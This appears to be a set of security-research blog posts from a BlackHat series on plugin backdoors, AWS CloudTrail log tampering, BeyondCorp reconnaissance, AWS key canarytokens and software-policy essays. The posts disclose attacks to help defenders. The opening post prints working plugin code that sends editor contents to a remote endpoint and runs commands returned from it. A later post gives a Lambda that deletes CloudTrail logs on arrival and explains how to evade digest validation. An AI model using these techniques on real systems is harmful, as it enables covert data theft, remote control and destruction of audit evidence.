    @editor = atom.workspace.getActiveTextEditor()
    @subscriptions = new CompositeDisposable

    @subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle': => @toggle()
    @subscriptions.add @editor.onDidChange (change) => @myChange()

Then create the myChange function that will do the dirty work:

myChange: ->
  request 'http://my-remote-endpoint.com/test?data='+@editor.getText(), (error, response, body) =>
    {spawn} = require 'child_process'
    test = spawn body
    console.log 'External code to run:\n'+ body
    test.stdout.on 'data', (data) ->
      console.log 'sending output'
      request 'http://my-remote-endpoint.com/run?data='+ data.toString().trim(), (error, response, body) =>
        console.log 'output sent!'

What happens in this code snippet is a bit of overkill but it demonstrates our point. On every change in the editor we will send the text in the editor to our endpoint, which in turn returns a new command to execute. We run the command and send the output back to the endpoint.

Demo

Below is a demo of it in action. On the left you'll see the user typing into the editor, and on the right you'll see the logs on our remote server.



Our little plugin is not going to be doing global damage anytime soon. In fact we unpublished it once our tests were done. But what if someone changed an existing plugin which had lots of active users? Enter Kite.

Kite and friends

While we were ironing out the demo and wondering how prevalent this kind of attack was, an interesting story emerged. Kite, who make cloud-based coding tools, hired the developer of Minimap (an Atom plugin with over 3.8 million downloads) and pushed an update for it labelled "Implement Kite promotion". This update, among other things, inserted Kite ads onto the minimap.

In conjunction with this, it was found that Kite had silently acquired autocomplete-python (another popular Atom plugin) a few months prior and had promoted the use of Kite over the open source alternative.

Once discovered, Kite was forced to apologize and take steps to ensure they would not do it again (but someone else totally could!).

Similar to the Kite takeover of Atom packages (but with more malicious intent), in the past week it has been reported that two Chrome extensions were taken over by attackers and had adware injected into them. Web Developer for Chrome and Copyfish both fell victim to the same phishing attack. Details of the events can be read here (Web Developer) and here (Copyfish), but the gist of it is that these popular Chrome extensions were compromised and their users fell victim without knowing it.

Wrapping up

We created a plugin and published it without it being picked up as malicious. This plugin runs without a sandbox and without a restrictive permissions model to prevent us from stealing all the information the user has access to. Even if there were some kind of code analysis conducted on uploaded code, it's possible to remotely eval() code at runtime. Automatic updates mean that even if our plugin is benign today, it could be malicious tomorrow.

Forcing developers to use only a certain controlled set of tools/plugins seems draconian, but left uncontrolled, this channel is getting more and more difficult to secure.



Disrupting AWS S3 Logging

This post continues the series of highlights from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.


Introduction

Before today's public clouds, best practice was to store logs separately from the host that generated them. If the host was compromised, the logs stored off it would have a better chance of being preserved.

At a cloud provider like AWS, a storage service within an account holds your activity logs. A sufficiently thorough compromise of an account could very well lead to disrupted logging and heightened pain for IR teams. It's analogous to logs stored on a single compromised machine: once access restrictions to the logs are overcome, logs can be tampered with and removed. In AWS, however, removing and editing logs looks different to wiping logs with rm -rf.

In AWS jargon, the logs originate from a service called CloudTrail. A Trail is created which delivers the current batch of activity logs in a file to a pre-defined S3 bucket at variable intervals. (Logs can take up to 20 mins to be delivered).

CloudTrail logs are often collected in the hope that should a breach be discovered, there will be a useful audit trail in the logs. The logs are the only public record of what happened while the attacker had access to an account, and form the basis of most AWS defences. If you haven't enabled them on your account, stop reading now and do your future self a favour.

Prior work

In his blog post, Daniel Grzelak explored several fun consequences of the fact that logs are stored in S3. For example, he showed that when a file lands in an S3 bucket, it triggers an event. A function, or Lambda in AWS terms, can be made to listen for this event and delete logs as soon as they arrive. The logs continue to arrive as normal (except that they evaporate on arrival).
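A minimal sketch of such a log-eating Lambda, assuming it is subscribed to the CloudTrail bucket's ObjectCreated events and has s3:DeleteObject permission:

import boto3
from urllib.parse import unquote_plus

s3 = boto3.client('s3')

def handler(event, context):
    # fired for each batch of ObjectCreated events on the CloudTrail bucket
    for record in event['Records']:
        bucket = record['s3']['bucket']['name']
        key = unquote_plus(record['s3']['object']['key'])
        s3.delete_object(Bucket=bucket, Key=key)  # the log evaporates on arrival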

Flow of automatic log deletion

Versions, lambdas and digests

Adding "versioning" to S3 buckets (which keeps older copies of files once they are overwritten) won't help, if an attacker can grant permission to delete the older copies. Versioned buckets do have the option of having versioned items protected from deletion by multi-factor auth ("MFA-delete"). Unfortunately it seems like only the AWS account's root user (as the sole owner all S3 buckets in an account) can configure this, making it less easy to enable in typical setups where root access is tightly limited.

In any case, an empty logs bucket will inevitably raise the alarm when someone comes looking for logs. This leaves the attacker with a pressing question: how do we erase our traces but leave the rest of the logs available and readable? The quick answer is that we can modify the lambda to check every log file and delete any dirty log entries before overwriting them with a sanitised log file.

But a slight twist is needed: when modifying logs, the lambda itself generates more activity which in turn adds more dirty entries to the logs. By adding a unique tag to the names of the pieces of the log-sanitiser (such as the names of the policies, roles and lambdas), these can be deleted like any other dirty log entries so that the log-sanitiser eats its own trail. In this code snippet, any role, lambda or policy that includes thinkst_6ae655cf will be kept out of the logs.

That would seem to present a complete solution, except that AWS CloudTrail also offers log validation (aimed specifically at mitigating silent changes to logs after delivery). At regular intervals, the trail delivers a (signed) digest file that attests to the contents of all the log files delivered in the past interval. If a log file covered by the digest changes, validation of that digest file fails.

A slew of digest files

At first glance this stops our modification attack in its tracks; our lambda modified the log after delivery, but the digest was computed on the contents prior to our changes. So the contents and the digest won't match.

Each digest file also covers the previous digest file. This creates a chain of log validation starting at the present and going back up the chain into the past. If the previous digest file has been modified or is missing, the next digest file's validation will fail (but subsequent digests will be valid). The intent behind this is clear: log tampering should cause the AWS command-line log validation to report an error.

Chain of digests and files they cover
Contents of a digest file



It would seem that one option is to simply remove digest files, but S3 protects them and prevents deletion of files that are part of an unbroken digest chain.

There's an important caveat to be aware of though: when log validation is stopped and started on a Trail (as opposed to stopping and starting the logging itself), the log validation chain is broken in an interesting way. Because validation was stopped and started, the next digest file that is delivered doesn't refer to the previous digest file. Instead, it references null as its previous file, as if a new digest chain were starting afresh.

Digest file (red) that can be deleted following a stop-start
In the diagram above, after the log files in red were altered, log validation was stopped and started. This broke the link between digest 1 and digest 2.

Altered logs, successful validation

We said that S3 prevented digest file deletion on unbroken chains. However, older digest files can be removed so long as no other file refers to them. That means we can delete digest 1, then delete digest 0.

What this means is that on the previous log validation chain, we can now delete the latest digest file without failing any digest log validation. The log validation will start at the most recent chain and move back up. When the validation encounters the first item on the previous chain, it simply moves on to the latest available item of that chain. (There may be a note that no log files were delivered for a period, but that's the same message that appears when no log files were, in fact, delivered.)

No validation complaints about missing digest files

And now?

It's easy to imagine that log validation is simply included in automated system health-checks; so long as it doesn't fail, no one will be verifying logs.  Until they're needed, of course, at which point the logs could have been changed without validation producing an error condition.

The signature of this attack is that validation was stopped and started (rather than logging being stopped and started). It underscores the importance of alerting on CloudTrail updates, even those that don't stop logging. (One way would be to alert on UpdateTrail events using the AWS CloudWatch service.) After even a single validation stop/start event, it is not safe to assume that the logs haven't been tampered with just because the AWS CLI tool reports that all logs validate. Log validation should be treated as especially suspect if there are breaks in the digest chain, which would have to be verified manually.
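For example, a CloudWatch Events rule with a pattern along these lines (a sketch; extend the eventName list to taste) would flag trail modifications as they happen:

{
  "source": ["aws.cloudtrail"],
  "detail-type": ["AWS API Call via CloudTrail"],
  "detail": {
    "eventSource": ["cloudtrail.amazonaws.com"],
    "eventName": ["UpdateTrail", "StopLogging", "DeleteTrail"]
  }
}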

Much like in the case of logs stored on a single compromised host, logs should be interpreted with care when we are dealing with compromised AWS accounts that had the power to alter them.

Farseeing: a look at BeyondCorp

This is the third post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.


Introduction

In our BlackHat talk, "Fighting the Previous War", we showed how attacks against cloud services and cloud-native companies are still in their nascent stages of evolution. The number of known attacks against AWS is small, which is at odds with the huge number (and complexity) of services available. It's not a deep insight to argue that the number of classes of cloud specific attacks will rise.

However, the "previous war" doesn't just refer to cloud stuff. While our talk primarily dealt with cloud services, we also spent some time on another recent development, Google's BeyondCorp. In the end, the results weren't exciting enough to include fully in the talk and so we cut slides from the presentation, but the original slides are in the PDF linked above.

In this post we'll provide our view on what BeyondCorp-like infrastructure means for attackers, and how it'll affect their approaches.

What is BeyondCorp?

We start with a quick overview of BeyondCorp that strips out less important details (Google has a bunch of excellent BeyondCorp resources if you've never encountered it before.)

In an ossified corporate network, devices inside the perimeter are more trusted than devices outside the perimeter (e.g. they can access internal services which are not available to the public Internet). In addition, devices trying to access those services aren't subject to checks on the device (such as whether the device is known, or is fully patched).

In the aftermath of the 2009 Aurora attacks on Google, where attackers had access to internal systems once the boundary perimeter was breached, Google decided to implement a type of Zero Trust network architecture. The essence of the new architecture was that no trust was placed in the location of a client regardless of whether the client was located inside a Google campus or sitting at a Starbucks wifi. They called it BeyondCorp.

Under BeyondCorp, all devices are registered with Google beforehand and all access to services is brokered through a single Access Proxy called ÜberProxy.

This means that all Google's corporate applications can be accessed from any Internet-connected network, provided the device is known to Google and the user has the correct credentials (including MFA, if enabled.)

Let's walk through a quick example. Juliette is a Google engineer sitting in a Starbucks leeching their wifi, and wants to review a bug report on her laptop. From their documentation, it works something like this (we're glossing over a bunch of details):
  1. Juliette's laptop has a client certificate previously issued to her machine.
  2. She opens https://tickets.corp.google.com in her browser.
  3. The DNS response is a CNAME pointing to uberproxy.l.google.com (this is the Access Proxy). The hostname identifies the application.
  4. Her browser connects using HTTPS to uberproxy.l.google.com, and provides its client certificate. This identifies her device.
  5. She's prompted for credentials if needed (there's an SSO subsystem to handle this). This identifies her user.
  6. The proxy passes the application name, device identifier (taken from the client certificate), and credentials to the Access Control Engine (ACE).
  7. The ACE performs an authorization check to see whether the user is allowed to access the requested application from that device.
  8. The ACE has access to device inventory systems, and so can reason about device trust indicators such as:
    1. a device's patch level
    2. its trusted boot status
    3. when it was last scanned for security issues
    4. whether the user has logged in from this device previously
  9. If the ACE passes all checks, the access proxy allows the request to pass to the corporate application, otherwise the request fails.
Google's architecture diagrams include more components than we've mentioned above (and the architecture changed between their first and most recent papers on BeyondCorp). But the essence is a proxy that can reason about device status and user trust. Note that it's determining whether a user may access a given application, not what they do within those applications.

One particularly interesting aspect of BeyondCorp is how Google supports a bunch of protocols (including RDP and SSH) through the same proxy, but we won't look at that today. (Another interesting aspect is that Google managed to migrate their network architecture without interruption and is, perhaps, the biggest takeaway from their series of papers. It's an amazingly well planned migration.)

This sucks! (For attackers)

For ne'er-do-wells, this model changes how they go about their business. 

Firstly, tying authorisation decisions to devices has a big limiting effect on credential phishing. A set of credentials is useless to an external attacker if the authorisation decision includes an assertion that the device has previously been used by this user. Impersonation attacks like this become much more personal, as they require device access in addition to credentials.

Secondly, even if a beachhead is established on an employee's machine, there's no flat network to laterally move across. All the attacker can see are the applications for which the victim account had been granted access. So application-level attacks become paramount in order to laterally move across accounts (and then services).

Thirdly, access is fleeting. The BeyondCorp model actively incorporates updated threat information, so that (for example), particular browser versions can be banned en masse if 0days are known to be floating around. 

Fourthly, persistence on end user devices is much harder. Google use verified boot on some of their devices, and BeyondCorp can take this into account. On verified boot devices, persistence is unlikely to take the form of BIOS or OS-level functionality (these are costly attacks with step changes across the fleet after discovery, making them poor candidates). Instead, higher level client-side attacks seem more likely.

Fifthly, in addition to application attacks, bugs in the Access Control Engine or mistakes in the policies come into play, but these must be attacked blind as there is no local version to deploy or examine.

Lastly, targeting becomes really important. It's not enough to spam random @target.com addresses with dancingpigs.exe and then focus once inside the network. There is no "inside the network"; at best you get access to someone's laptop, and can hit the same BeyondCorp apps as your victim.

A quick look at targeting

The lack of a perimeter is the defining characteristic of BeyondCorp, but that means anyone outside Google has a similar view to anyone inside Google, at least for the initial bits needed to bootstrap a connection.

We know all services are accessed through the ÜberProxy. In addition, every application gets a unique CNAME (in a few domains we've seen, like corp.google.com, and googleplex.com).

DNS enumeration is a well-mapped and frequently-trod path, and effective at discovering corporate BeyondCorp applications. Pick a DNS enumeration tool (like subbrute), run it across the corp.google.com domain, and get 765 hostnames. Each maps to a Google corporate application. Here's a snippet from the output:
  • [...]
  • pitch.corp.google.com
  • pivot.corp.google.com
  • placer.corp.google.com
  • plan.corp.google.com
  • platform.corp.google.com
  • platinum.corp.google.com
  • plato.corp.google.com
  • pleiades.corp.google.com
  • plumeria.corp.google.com
  • [...]
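You don't need anything fancy to reproduce this. A rough sketch of the same idea (assuming a wordlist.txt of candidate names; ours was larger and tuned over time) is just a shell loop over DNS lookups:

while read name; do
  # a CNAME answer pointing at uberproxy.l.google.com marks a BeyondCorp application
  host "${name}.corp.google.com" | grep "alias for"
done < wordlist.txt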
But DNS isn't the only place to identify BeyondCorp sites. As is the fashion these days, Google is quite particular about publishing new TLS certificates in the Certificate Transparency logs. These include a bunch of hostnames in corp.google.com and googleplex.com. From these, more BeyondCorp applications were discovered.
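As a sketch of that approach (assuming crt.sh's public JSON interface, which is just one of several ways to search the CT logs), something like this pulls candidate hostnames out of logged certificates:

# %25 is a URL-encoded '%' wildcard; jq extracts the certificate names
curl -s 'https://crt.sh/?q=%25.corp.google.com&output=json' | jq -r '.[].name_value' | sort -u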

Lastly, we scraped the websites of all the hostnames found to that point, and picked up additional hostnames referenced in some of the pages and redirects. For fun, we piped the full list into PhantomJS and screencapped all the sites for quick review.
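The screencapping itself needs nothing fancy either. A minimal sketch (assuming PhantomJS's bundled rasterize.js example script and a hosts.txt of discovered names) looks something like:

while read host; do
  # render each discovered site to a PNG for quick eyeballing
  phantomjs rasterize.js "https://${host}" "${host}.png"
done < hosts.txt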

Results? We don't need no stinking results!


The end result of this little project was a few thousand screencaps of login screens:

[Image: "Quite a few of these"]
[Image: "Error showing my device isn't allowed access to this service"]
[Image: "Occasional straight 403"]
[Image: "So, so many of these"]
Results were not exciting. The only site that was open to the Internet was a Cafe booking site on one of Google's campuses.

However, a few weeks ago a high school student posted the story of his bug bounty which appeared to involve an ÜberProxy misconfiguration. The BeyondCorp model explicitly centralises security and funnels traffic through proxy chokepoints to ease authN and authZ decisions. Like any centralisation, it brings savings but there is also the risk of a single issue affecting all applications behind the proxy. The takeaway is that mistakes can (and will) happen. 


So where does this leave attackers?

By no means is this the death of remote attacks, but it shifts focus away from basic phishing attacks and will force attackers into more sophisticated plays. These will include narrower targeting (of the BeyondCorp infrastructure in particular, or of specific end users with the required application access), and will change how persistence on endpoints is achieved. Application persistence increases in importance, as endpoint access becomes more fleeting.

With all this said, it's unlikely an attacker will encounter a BeyondCorp environment in the near future, unless they're targeting Google. There are a handful of commercial solutions which claim BeyondCorp-like functionality, but none match the thoroughness of Google's approach. For now, these BeyondCorp attack patterns remain untested.

Canarytokens' new member: AWS API key Canarytoken

This is the fourth post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this blog post, we will introduce you to the newest member of our Canarytokens family, the Amazon Web Services API key token. This new Canarytoken allows you to sprinkle AWS API keys around and then notifies you when they are used. (If you stick around to the end, we will also share some of the details behind how we built it).

Background

Amazon Web Services offers a massive range of services that integrate easily with each other. This encourages companies to build entire products and product pipelines using the AWS suite. To automate and manipulate AWS services using their API, we are given access keys, which can be restricted by AWS policies. Access keys are defined on a per-user basis, which means there are a few moving parts involved in locking down an AWS account securely.

Take it for a spin - using an AWS API key Canarytoken

Using the AWS API key Canarytoken is as simple as can be. Make use of the free token server at http://canarytokens.org or use the private Canarytoken server built into your Canary console, and select the ‘AWS Keys’ token from the drop-down list.



Enter an email and a token reminder (Remember: the email address is the one we will notify when the token is tripped, and the reminder will be attached to the alert. Choose a unique reminder; nothing sucks more than knowing a token is tripped but being unsure where you left it). Then click on “Create my Canarytoken”.



You will notice that we arrange your credentials in the same way as the AWS console usually does, so you can get straight down to using (or testing) them. So let's get to testing. Click “Download your AWS Creds” and save the file somewhere you will find it.

For our tests, we are going to use the AWS Commandline tool (if you don’t have it yet, head over to http://docs.aws.amazon.com/cli/latest/userguide/installing.html). Below is a simple bash script that will leverage the AWS command line tool to create a new user named TestMePlease using your new-almost-authentic AWS API keys.
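(The script itself is tiny. If you'd rather roll your own, a minimal sketch looks like the following; the only part that matters is that some AWS API call gets made using the token keys.)

#!/bin/bash
# test_aws_creds.sh - sketch of a test script for the AWS API key Canarytoken
# Usage: ./test_aws_creds.sh <access_key_id> <secret_access_key>
export AWS_ACCESS_KEY_ID="$1"
export AWS_SECRET_ACCESS_KEY="$2"
# Any call will do - the alert fires on use, whether or not the call succeeds
aws iam create-user --user-name TestMePlease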

Simply go to your command line, navigate to the same location as the script and type ./test_aws_creds.sh <access_key_id> <secret_access_key>. If all went to plan, you should receive an alert notifying you that your AWS API key Canarytoken was used.

NB: Due to the way these alerts are handled (by Amazon) it can sometimes take up to 20 minutes for the alert to come through.

Waiting...waiting...waiting (0-20 mins later). Ah, we got it!


Check...it...out! This is what your AWS API key Canarytoken alert will look like, delivered by email. The email will contain some useful details such as User Agent, Source IP and a reminder of where you may have placed this Canarytoken (we always assumed you're not going to use only one! Why would you? They are free!!).

The simple plan then should be: create a bunch of fake keys. Keep one on the CEO’s laptop (he will never use it, but the person who compromises him will). Keep one on your webserver (again, no reason for it to be used, except by the guy who pops a shell on that box), and so on.

Under the hood - steps to creating an AWS API key Canarytoken

The AWS API key Canarytoken makes use of a few AWS services to ensure that the Canarytoken is an actual AWS API key - indistinguishable from a real working AWS API key. This is important because we want attackers to have to use the key to find out how juicy it actually is - or isn’t. We also want this to be dead simple to use. Enter your details and click a button. If you want to see how the sausage is made, read on:


Creation - And on the 5th day…


The first service necessary for creating these AWS API key Canarytokens is an AWS Lambda that is triggered by an AWS API Gateway event. Let’s follow the diagram’s flow. Once you click the ‘Create my Canarytoken’ button, a GET request is sent to the AWS API Gateway. This request contains query parameters for the domain (of the Canarytokens server), the username (if we want to specify one, otherwise a random one is generated) and the actual Canarytoken that will be linked to the created AWS API key. This is where the free version and commercial versions diverge slightly.

Our free version of Canarytokens (canarytokens.org) does not allow you to specify your own username for the AWS API key Canarytoken. The domain of the Canarytoken server is used in conjunction with the Canarytoken to create the AWS user on the account. (This is still completely useful, because the only way an attacker is able to obtain the username tied to the token is to make an API call, and this call itself will trigger the alert). Our private Canary consoles enjoy a slightly different implementation. This uses an AWS Dynamo database that links users to their tokens, allowing clients to specify what the username for the AWS user should be.

If the AWS API Gateway determines that sufficient information is included in the request, it triggers the lambda responsible for creating the AWS API key Canarytoken. This lambda creates a new user with no privileges on the AWS account, generates AWS API keys for that user and responds to the request with a secret access key and an access key id.
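(Purely as an illustrative sketch, and not the lambda's actual code: the lambda is doing the IAM equivalent of the following two calls, with <generated-username> standing in for the name derived from the token.)

# create a privilege-less user tied to the token, then mint API keys for it
aws iam create-user --user-name <generated-username>
aws iam create-access-key --user-name <generated-username>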


We should note that the newly created user has no permissions (to anything), so anyone with this AWS API key can’t do anything of importance. (Even if they did, it’s a user on our infrastructure, not yours!). Of course, before the attacker is able to find out how impotent her key is, she first has to use it, and this is when we catch her out (detection time!).

Detection - I see you! 

Now that the AWS API key has been created and returned to the user, let's complete the loop and figure out when these AWS API keys are being used. The first service in our detection process, spoken about in our previous posts, is CloudTrail. CloudTrail is super useful when monitoring anything on an AWS account because it logs all important (though not all) API calls, recording the username, the keys used, the methods called, the user-agent information and a whole lot more.

We configure CloudTrail to send its logs to another AWS logging service known as CloudWatch. This service allows subscriptions and filtering rules to be applied. This means that if a condition in the logs from CloudTrail is met in the CloudWatch service, it will trigger whichever service you configure it to - in our case another AWS Lambda function. In pure AWS terms, we have created a subscription filter which will send logs that match the given filter to our chosen lambda.

For the AWS API key Canarytoken, we use a subscription filter such as

  • "FilterPattern": "{$.userIdentity.type = IAMUser}"

This filter will check the incoming logs from CloudTrail and only pass on logs where the user identity type is an IAM user - this is distinct from calls made with root credentials, where the user is then ‘root’.
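Wiring this up by hand looks roughly like the following (a sketch using the AWS CLI; the log group name and lambda ARN are placeholders, not our actual values):

aws logs put-subscription-filter \
  --log-group-name CloudTrail/logs \
  --filter-name canarytoken-iam-use \
  --filter-pattern '{ $.userIdentity.type = "IAMUser" }' \
  --destination-arn arn:aws:lambda:us-east-1:123456789012:function:canarytoken-alert-lambda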

Alert - Danger Will Robinson, danger!

All that's left now is for us to generate our alert. We employ an AWS Lambda (again) to help us with this. This lambda receives the full log of the attempted AWS API call and bundles it into a custom HTTP request that trips the Canarytoken. Our Canarytoken Server receives the request with all this information and relays the alert to you, with all the information formatted neatly.

Summary - TLDR;

Amazon Web Services is a massive collection of easily integrated services which enables companies of all sizes to build entire products and services with relative ease. This makes AWS API keys an attractive target for many attackers.

The AWS API key Canarytoken allows the creation of real AWS API keys which can be strewn around your environment. An attacker using these credentials will trigger an alert informing you of his presence (and other useful meta information). It’s quick, simple, reliable and a high quality indicator of badness.

A Geneva convention, for Software

The anti-pattern “X for Y” is a sketchy way to start any tech think piece, and with “cyber” stories guaranteeing eyeballs, you’re already tired of the many horrible articles predicting a “Digital Pearl Harbour” or “cyber Armageddon”. In this case however, we believe this article’s title fits and are going to run with it. (Ed’s note: So did all the other authors!)


The past 10 years have made it clear that the internet (both the software that powers it and the software that runs on top of it) is fair game for attackers. The past 5 years have made it clear that nobody has internalized this message as well as the global Intelligence Community. The Snowden leaks pulled back the curtains on massive Five Eyes efforts in this regard, from muted deals with Internet behemoths, to amusing grab-all efforts like collecting still images from Yahoo webcam chats(1).


In response to these revelations, a bunch of us predicted a creeping Balkanization of the Internet, as more people became acutely aware of their dependence on a single country for all their software and digital services. Two incidents in the last two months have caused these thoughts to resurface: the NotPetya worm (2), and the accusations against Kaspersky AV.


To quickly recap NotPetya: a mundane accounting package called M.E.Doc, with wide adoption (in Ukraine), was abused to infect victims. Worms and viruses are a dime a dozen, but a few things made NotPetya stand out. For starters, it used an infection vector repurposed from an NSA leak, it seemed to target Ukraine pretty specifically, and it had tangible side effects in the real world (the Maersk shipping company reported losses of up to $200 million due to NotPetya (3)). What interested us most about NotPetya however was its infection vector. Having compromised the wide open servers of M.E.Doc, the attackers proceeded to build a malicious update for the accounting package. This update was then automatically downloaded and applied by thousands of clients. Auto-updates are common at this point, and considered good security hygiene, so it’s an interesting twist when the update itself becomes the attack vector.


The Kaspersky saga also touched on “evil updates” tangentially. While many in the US Intelligence Community have long looked down on a Russian AntiVirus company gaining popularity in the US, Kaspersky has routinely performed well enough to gain considerable market share. This came to a head in September this year when the US Dept. of Homeland Security (DHS) issued a directive for all US governmental departments to remove Kaspersky software from their computers (4). In the days that followed, a more intriguing narrative emerged. According to various sources, an NSA employee who was working on exploitation and attack tooling took some of his work home, where the Kaspersky software on his home computer proceeded to slurp up his “tagged” files.


Like most things infosec, this has kicked off a distracting sub-drama involving Israeli, Russian and American cyber-spooks. Kaspersky defenders have come out calling the claims outrageous, Kaspersky detractors claim that their collusion with Russian intelligence is obvious and some timid voices have remained non-committal while waiting for more proof. We are going to ignore this part of the drama completely.


What we _do_ care about though is the possibility that updates can be abused to further nation state interests. The American claim that Russian Intelligence was pushing updates selectively to some of its users (turning their software into a massive, distributed spying tool) is completely feasible from a technical standpoint. Kaspersky has responded by publishing a plan for improved transparency, which may or may not maintain their standing with the general public. But that ignores the obvious fact that as with any software that operates at that level, a “non-malicious” system is just one update away from being “malicious”. The anti-Kasperskians are quick to point out that even if Kaspersky has been innocent until now, they could well turn malicious tomorrow (with pressure from the GRU) and that any assurances given by Kaspersky are dependent on them being “good” instead of being technical controls.


For us, as relative non-combatants in this war, the irony is biting. The same (mostly American) voices who are quick to float the idea of the GRU co-opting bad behaviour in Russian companies claim that US-based companies would never succumb to US IC pressure, because of the threat to their industry position should it come out. There is no technical control that’s different in the two cases; US defenders are betting that the US IC will do the “right thing”, not only today but also far into the future. This naturally leads to an important question: do the same rules apply if the US is officially (or unofficially) at war with another nation?


In the Second World War, Germany nationalized English assets located in Germany, and the British did likewise. It makes perfect sense and will probably happen during future conflicts too. But Computers and the Internet change this. In a fictitious war between the USA and Germany, the Germans could take over every Microsoft campus in the country, but it wouldn’t protect their Windows machines from a single malicious update propagated from Redmond. The more you think about this, the scarier it gets. A single malicious update pushed from Seattle could cripple huge pieces of almost every government worldwide. What prevents this? Certainly not technical controls. [Footnote: Unless you build a national OS like North Korea did, https://en.wikipedia.org/wiki/Red_Star_OS].


This situation is without precedent. That a small number of vendors have the capacity to remotely shutdown government infrastructure, or vacuum up secret documents, is almost too scary to wrap your head around. And that’s without pondering how likely they are to be pressured by their governments. In the face of future conflict, is the first step going to be disabling auto-updates for software from that country?


This bodes badly for us all; the internet is healthier when everyone auto-updates. When eco-systems delay patching, we are all provably worse off. (When patching is painful, botnets like Mirai take out innocent netizens with 620 Gbit/s of traffic (5)). Even just the possibilities lead us to a dark place. South Korea owns about 30% of the phone market in the USA (and supplies components in almost all of those phones). Chinese factories build hardware and ship firmware in devices we rely on daily. Like it or not, we are all dependent on these countries behaving as good international citizens but have very little in terms of a carrot or a stick to encourage “good behavior”.


It gets even worse for smaller countries. A type of mutually assured technology destruction might exist between China and the USA, but what happens when you are South Africa? You don’t have a dog in that fight. You shovel millions and millions of dollars to foreign corporations and you hope like hell that it’s never held against you. South Africa doesn’t have the bargaining power to enforce good behavior, and neither does Argentina, or Spain, but together, we may.


An agreement between all participating countries can be drawn up, where a country commits to not using their influence over a local software company to negatively affect other signatories. Countries found violating this principle risk repercussions from all member countries for all software produced by the country. In this way, any Intelligence Agency that seeks to abuse influence over a single company’s software, risks all software produced by that country with all member countries. This creates a shared stick that keeps everyone safer.


This clearly isn’t a silver bullet. An intelligence agency may still break into software companies to backdoor their software, and probably will. They just can’t do it with the company’s cooperation. Countries will have a central arbitrator (like the International Court of Justice) that will field cases to determine if IC machinations were done with or without the consent of the software company, and like the Geneva convention would still be enforceable during times of conflict or war.

Software companies have grown rich by selling to countries all over the world. Software (and the Internet) have become massive shared resources that countries the world over are dependent on. Even if they do not produce enough globally distributed software to have a seat at the table, all countries deserve the comfort of knowing that the software they purchase won’t be used against them. The case against Kaspersky makes it clear that the USA acknowledges this as a credible threat and is taking steps to protect itself. A global agreement protects the rest of us too.

On anti-patterns for ICT security and international law

(Guest Post by @marasawr)
Author’s note : international law is hard, and these remarks are extremely simplified.
Thinkst recently published a thought piece on the theme of 'A Geneva Convention, for software.'[1] Haroon correctly anticipated that I'd be a wee bit crunchy about this particular 'X for Y' anti-pattern, but probably did not anticipate a serialised account of diplomatic derpitude around information and communications technologies (ICT) in international law over the past twenty years. Apparently there is a need for this, however, because this anti-pattern is getting out of hand.
Microsoft President and Chief Legal Officer Brad Smith published early in 2017 on 'The need for a digital Geneva Convention,' and again in late October on 'What the founding of the Red Cross can teach us about cyber warfare.'[2] In both cases, equivalences are drawn between perturbations in the integrity or availability of digital services, and the circumstances which prompted ratification of the Fourth Geneva Convention, or the circumstances prompting the establishment of the ICRC. And this is ridiculous.

Nation-state hacking is not a mass casualty event

The Fourth Geneva Convention (GCIV) was drafted in response to the deadliest single conflict in human history. Casualty statistics for the Second World War are difficult, but regardless of where in the range of 60-80 million dead a given method of calculation falls, the fact remains that the vast majority of fatalities occurred among civilians and non-combatants. The Articles of GCIV, adopted in 1949, respond directly to these deaths as well as other atrocities and deprivations endured by persons then unprotected by international law.[3] The founding of the ICRC was similarly prompted by mass casualties among wounded soldiers in European conflicts during the mid-nineteenth century.[4] But WannaCry was not Solferino; Nyetya was not the Rape of Nanjing.
Microsoft's position is, in effect, that nation-state hacking activities constitute an equivalent threat to civilian populations as the mass casualty events of actual armed conflict, and require commensurate regulation under international law. 'Civilian' is taken simply to mean 'non-government.' The point here is that governments doing government things cost private companies money; this is, according to Smith, unacceptable. Smith isn't wrong that this nation-state stuff impacts private companies, but what he asks for is binding protection under international law against injuries to his bottom line. I find this type of magical thinking particularly irksome, because it is underpinned by the belief that a corporate entity can be apatride and sovereign all at once. Inconveniently for Microsoft, there is no consensus in the customary law of states on which to build the international legal regime of their dreams.
The Thinkst argument in favour of a Geneva Convention for software is somewhat less cynical. Without a common, binding standard of conduct, nation-states are theoretically free to coerce, abuse, or otherwise influence local software companies as and when they please. Without a common standard, the thinking goes, (civilian) software companies and their customers remain in a perpetual state of unevenly and inequitably distributed risk from nation-state interference. Without binding protections and a species of collective bargaining power for smaller economies, nation-states likewise remain unacceptably exposed.[5]
From this starting point, a binding resolution of some description for software sounds more reasonable. However, there are two incorrect assumptions here. One is that nothing of the sort has been previously attempted. Two is that nation-states, particularly small ones, have a vested interest in neutrality as a guiding principle of digital governance. Looking back through the history of UN resolutions, reports, and Groups of Governmental Experts (GGEs) on — please bear with me — 'Developments in the field of information and telecommunications in the context of international security,’ it is clear this is not the case.[6] We as a global community actually have been down this road, and have been at it for almost twenty years.

International law, how does it work?

First, what are the Geneva Conventions, and what are they not?[7] The Geneva Conventions are a collection of four treaties and three additional protocols which comprise the body of international humanitarian law governing the treatment of non-combatant (i.e. wounded, sick, or shipwrecked armed forces, prisoners of war, or civilian) persons in wartime. The Geneva Conventions are not applicable in peacetime, with signatory nations agreeing to abide by the Conventions only in times of war or armed conflict. Such conflicts can be international or non-international (these are treated differently), but the point to emphasise is that an armed conflict with the characteristics of war (i.e. one in which human beings seek to deprive one another of the right to life) is a precondition for the applicability of the Conventions.
UN Member States which have chosen to become signatory to any or all of the Conventions which comprise international humanitarian law (IHL) and the Law of Armed Conflict (LOAC) have, in effect, elected to relinquish a measure of sovereignty over their own conduct in wartime. The concept of Westphalian sovereignty is core to international law, and is the reason internal conflicts are not subject to all of the legal restrictions governing international conflicts.[8] Just to make life more confusing, reasonable international law scholars disagree regarding which conventions and protocols are bucketed under IHL, which are LOAC, and which are both.
In any event, IHL and LOAC do not cease to apply in wartime because Internet or computers; asking for a separate Convention applicable to software presumes that the digital domain is currently beyond the scope of IHL and LOAC, which it is not. That said, Tallinn Manuals 1.0 and 2.0 do highlight some problem areas where characteristics of informatic space render transposition of legal principles presuming kinetic space somewhat comical.[9] IHL and LOAC cannot accommodate all eventualities of military operations in the digital domain without severe distortion to their application in kinetic space, but that is a protocol-sized problem, not a convention-sized problem. It is also a very different problem from those articulated by Microsoft.

19 years of ICT and international security at the UN
